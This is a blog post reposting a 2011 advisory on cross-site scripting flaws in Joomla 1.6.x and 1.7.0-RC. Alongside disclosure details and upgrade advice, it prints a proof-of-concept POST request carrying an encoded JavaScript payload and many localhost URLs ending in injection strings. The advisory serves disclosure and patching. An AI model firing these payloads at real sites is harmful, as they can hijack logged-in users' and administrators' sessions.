Joomla Multiple Cross Site Scripting Vulnerabilities

VM-Vulnerabilidad

#Joomla Multiple Cross Site Scripting (#XSS) #Vulnerabilities

I recive today this notification about XSS Joomla Vulnerability, I know some Web Developers and Web Masters use this CMS to create web sites, it´s very important take an action to fix this vulnerability, Don’t leave your CMS with out fix the problem.
Here is the resume and steps to fix this vulnerability:

1. OVERVIEW

Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple Cross Site Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.

3. VULNERABILITY DESCRIPTION

Several parameters (searchword, Request URI) in Joomla! Core components are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim’s browser.

4. VERSION AFFECTED

1.7.0-RC and all versions of 1.6.x

5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /joomla164_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla164_noseo/
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search’;onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]

XSS in Request URI
====================
File: ./includes/application.php
Line: 176, 181
Code: $document->setBase(JURI::current()); // instead of $document->setBase(htmlspecialchars(JURI::current()));

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/new-feed-categories/'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/search-component/search/'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/'”>

http://localhost/joomla164/index.php/site-map/contacts/'”>

http://localhost/joomla164/index.php/component/banners/click/3′”>

http://localhost/joomla164/index.php/fruit-encyclopedia/'”>

http://localhost/joomla164/index.php/fruit-encyclopedia/38-a'”>

http://localhost/joomla164/index.php/fruit-encyclopedia/39-b'”>

http://localhost/joomla164/index.php/fruit-encyclopedia/57-t'”>

http://localhost/joomla164/index.php/growers/23-happy-orange-orchard'”>

http://localhost/joomla164/index.php/image-gallery/animals/25-koala'”>

http://localhost/joomla164/index.php/image-gallery/scenery/64-blue-mountain-rain-forest'”>

http://localhost/joomla164/index.php/image-gallery/scenery/65-ormiston-pound'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/34-park-site/'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/34-park-site/2-webmaster'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/35-shop-site/'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/35-shop-site/8-shop-address'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised/'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised/67-whats-new-in-15′”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/26-park-site'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'”>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'”>

6. IMPACT

Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions.

7. SOLUTION

The development of Joomla! 1.6.x has been ceased; there will be no fixed version for 1.6.x. Upgrade to Joomla! 1.7.0-stable or higher.

8. VENDOR

Joomla! Developer Team http://www.joomla.org

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed

11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(XSS)

Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla

Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

I hope this information will be usefully to you.

Regards

Comparte este Post:

Tags: , , , , , , , , , , ,

Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx

Deja un comentario





June 2019
M T W T F S S
« Oct    
 12
3456789
10111213141516
17181920212223
24252627282930
wordpress visitors